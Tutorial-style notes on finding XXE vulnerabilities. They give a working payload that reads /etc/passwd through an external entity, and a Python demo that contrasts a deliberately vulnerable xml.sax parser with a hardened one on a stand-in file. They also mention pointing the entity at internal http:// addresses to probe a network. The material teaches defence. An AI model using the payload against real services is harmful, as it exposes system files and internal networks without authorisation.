How to tell whether an XXE vulnerability is present
Capture the request
Check whether the body is formatted as XML
Find the echo point (a field whose value is reflected in the response; without one the read is blind and the result has to be pulled out-of-band)
Build a payload that reads a file, e.g.
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user><username>&xxe;</username><password>admin</password></user>
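The steps above, carried through end to end as an added example (not code from the original notes): the payload is built with the SYSTEM URI as a parameter, fed to a deliberately vulnerable parser and to a hardened one, and the value of the username echo point is read back. It uses Python's standard xml.sax parser, whose feature_external_ges flag controls external general entity expansion (off by default since Python 3.7.1; the vulnerable function switches it on to stand in for a misconfigured server-side parser). The target file is a constructed stand-in for /etc/passwd written to a temporary directory, so the demo runs offline without touching the real system file. The hardened function's DOCTYPE check and all function names are this example's own assumptions.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler

# Constructed sample standing in for /etc/passwd on the target host.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def build_payload(target_uri):
    """The notes' file-read payload with the SYSTEM URI as a parameter (bytes)."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE note [\n'
        f'<!ENTITY xxe SYSTEM "{target_uri}">\n'
        ']>\n'
        '<user><username>&xxe;</username><password>admin</password></user>'
    ).encode()


class _UserHandler(handler.ContentHandler):
    """Collects the text of <username> and <password>, i.e. the echo point."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._buf = None

    def startElement(self, name, attrs):
        if name in ("username", "password"):
            self._buf = []

    def characters(self, content):
        # Text from an expanded external entity arrives here too.
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if self._buf is not None:
            self.fields[name] = "".join(self._buf)
            self._buf = None


def _run_parser(xml_bytes, external_ges):
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, external_ges)
    h = _UserHandler()
    parser.setContentHandler(h)
    parser.parse(io.BytesIO(xml_bytes))
    return h.fields


def parse_user_vulnerable(xml_bytes):
    """Vulnerable: external general entities are resolved, so &xxe; expands to
    the content of whatever the SYSTEM URI points at (file://, http://, ...)."""
    return _run_parser(xml_bytes, external_ges=True)


def parse_user_hardened(xml_bytes):
    """Hardened (assumed policy): refuse any DTD outright so the request fails
    loudly instead of silently expanding the entity to an empty string, and
    keep external entity expansion disabled."""
    if b"<!doctype" in xml_bytes.lower():
        raise ValueError("DTD/DOCTYPE not accepted by this endpoint")
    return _run_parser(xml_bytes, external_ges=False)


def demo():
    """Write the sample file, send the payload to both parsers and return
    (text echoed by the vulnerable parser, whether the hardened one refused)."""
    with tempfile.TemporaryDirectory() as d:
        passwd = Path(d) / "passwd"
        passwd.write_text(SAMPLE_PASSWD)
        payload = build_payload(passwd.as_uri())  # e.g. file:///tmp/.../passwd
        leaked = parse_user_vulnerable(payload)["username"]
        try:
            parse_user_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser echoed the file:\n" + leaked)
    print("hardened parser refused the DTD:", blocked)
```

The same payload shape works against any parser that resolves SYSTEM entities; swapping the file:// URI for an http:// one is what the intranet-probing step below relies on, since the parser then fetches the URL from inside the target network. For real services the usual fix is to disable DTD processing at the parser level (for Python, the defusedxml package wraps the standard parsers to do exactly that) rather than to grep the request body as the hardened function does here.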
XXE intranet probing (the SYSTEM entity can point at an internal http:// address instead of a file):
https://blog.csdn.net/weixin_43221560/article/details/108152738